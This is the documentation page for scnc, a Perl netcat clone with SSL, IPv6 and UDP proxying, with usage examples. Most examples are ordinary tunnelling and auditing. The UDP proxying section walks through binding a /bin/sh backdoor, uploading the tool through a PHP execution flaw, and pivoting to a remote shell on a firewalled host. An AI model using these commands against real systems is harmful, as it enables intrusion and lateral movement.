SSL Capable NetCat (and more)

Introduction

You all know what is netcat (written by Hobbit in 1996), how to use it and that it should have been integrated in all UNIX systems a long time ago. netcat lacked some features, and I tried to add them in this Perl version. For example, SSL support, TCP and UDP proxying and IPv4/IPv6 proxying features. This is now done, unless I missed a bug. Now, enjoy.

Usage

SSL Capable NetCat 1.04

Usage: scnc [-options] host port

See `perldoc scnc' for full documentation

   -c                use SSL (default to not)
   -a ca.pem         use SSL certificate authority file
   -f cert.pem       use SSL certificate file (PEM format)
   -k cert-key.pem   use SSL private key file (PEM format)
   -6                use IPv6 (default to not)
   -t                do telnet negociation (default to not)
   -e cmd            command to execute
   -l                listen for connections (default to not)
   -p port           use local port number (default to random high)
   -s address        use address for bindings (default to all addresses)
   -u                use UDP socket (default to TCP)
   -v                be verbose (default to not)
   -z                test port for openness
   -w timeout        timeout before closing connection (default to infinite)
   -r host:port           proxy connection to host:port
   -r host:port:ipv6      proxy connection to host:port using IPv6
   -r host:port::ssl      proxy connection to host:port using SSL
   -r host:port:ipv6:ssl  proxy connection to host:port using IPv6 and SSL

Download

• scnc 1.04
• scnc 1.03

Example applications

Securing a connection with a SSL tunnel

You have a server and a client (of course) that you control. You have a service that does not support SSL but you want to establish a SSL connection to avoid a peer being able to read your traffic. The solution is to create a SSL tunnel (like with ssltunnel or stunnel).

• Server side (scnc will listen on port 10000/TCP using SSL and redirect traffic to localhost port 110/TCP):

prompt$ scnc -vc -a ca.pem -f server.pem -k server-key.pem -p 10000 -r localhost:110
server: SSL listening on: 0.0.0.0:10000 (IPv4)

• Client side (scnc will listen on localhost port 1110/TCP and redirect traffic to server port 10000/TCP using SSL):

prompt$ scnc -v -s localhost -p 1110 -r server:10000::ssl
server: listening on: 127.0.0.1:1110 (IPv4)

Now, you can use your client side application and use localhost and port 1110/TCP as the server address. All traffic will use SSL to secure your connection.

Proxying SSL to access traffic in clear-text

You are auditing a HTTPS only web server. You want to use your classic sniffer or Web application proxying tool. So you want to remove the SSL encryption to ease your task.

• Client side to become a SSL proxy (scnc will listen on localhost port 1443/TCP and redirect traffic to audited-server port 443/TCP using SSL and some client certificates):

prompt$ scnc -v -r audited-server:443::ssl -a ca.pem -f client.pem -k client-key.pem -s localhost -p 1443
server: listening on: 127.0.0.1:1443 (IPv4)

• Client side example:

prompt$ scnc -v localhost 1443
client: connected to: 127.0.0.1:1443 (IPv4)
GET / HTTP/1.0

HTTP/1.1 302 Found
Date: Thu, 27 Apr 2008 11:25:50 GMT
Server: Apache
...

You can now use your classic auditing tool and use localhost with port 1443/TCP as the target server. All traffic to localhost port 1443/TCP will be in clear-text.

Accessing IPv6 hosts from an IPv4 only host

You have a client IPv4 only machine and you have a dual-stack (IPv4/IPv6) machine. You do not want to configure a tunnel broker because in your particular context, you have not enough time. So you want to proxy an IPv4 connection to access an IPv6 server.

• On a dual-stack server machine (scnc will listen on port 10000/TCP and redirect traffic to www.kame.net port 80/TCP using IPv6 connection):

prompt$ scnc -vp 10000 -r www.kame.net:80:ipv6
server: listening on: 0.0.0.0:10000 (IPv4)

You can now use your classic IPv4 client application on your machine to connect to your server host port 10000/TCP. For our example, use Firefox to connect to the server port 10000/TCP. You should see the animated turtle.

Making IPv4 only programs working with IPv6

You have an application that only works in IPv4 mode. You want to make it accessible to IPv6 hosts.

• On the server where an application works only in IPv4 mode (scnc will listen on port 1666/TCP in IPv6 mode and redirect traffic to localhost port 666/TCP using an IPv4 connection):

prompt$ scnc -v6p 1666 -r localhost:666:ipv4
server: listening on: :::1666 (IPv6)

You can now use your classic IPv6 client application to connect to your server host port 1666/TCP.

UDP proxying

Say, you have a server listening on 31337/UDP, with a /bin/sh backdoor. This port is firewalled, and you MUST use a port forwarding technic, because the only IP address allowed is the 192.168.10.200. This IP address has a service (a Web application written in PHP that allows you to upload and execute a command). This should be game over for this host, but you are not interested in it and want to go the easy way. You exploit the vulnerability to first upload scnc, then to execute it with proxying paramaters. Here we go:

• Backdoored target (172.16.10.1:31337/UDP):

prompt$ scnc -vul -e /bin/sh -p 31337
server: listening on: 0.0.0.0:31337 (IPv4)

• Proxying host with vulnerability (192.168.10.200:9000/UDP):

prompt$ scnc -vu -r 172.16.10.1:31337 -p 9000
server: listening on: 0.0.0.0:9000 (IPv4)

• Attacking host:

prompt$ scnc -vu 192.168.10.200 9000
client: connected to: 192.168.10.200:9000 (IPv4)
sh: turning off NDELAY mode
id
uid=1000(user) gid=1000(users) ...

You have now a fully working UDP proxied tunnel. If you have TCP access, of course, you should use TCP proxying.

Test SSL certificates

If you want to test SSL features, you can use the following certificates. WARNING: they have been generated using the ugly Debian "patched" OpenSSL library :)

• CA certificate
• Server certificate
• Server key
• Client certificate
• Client key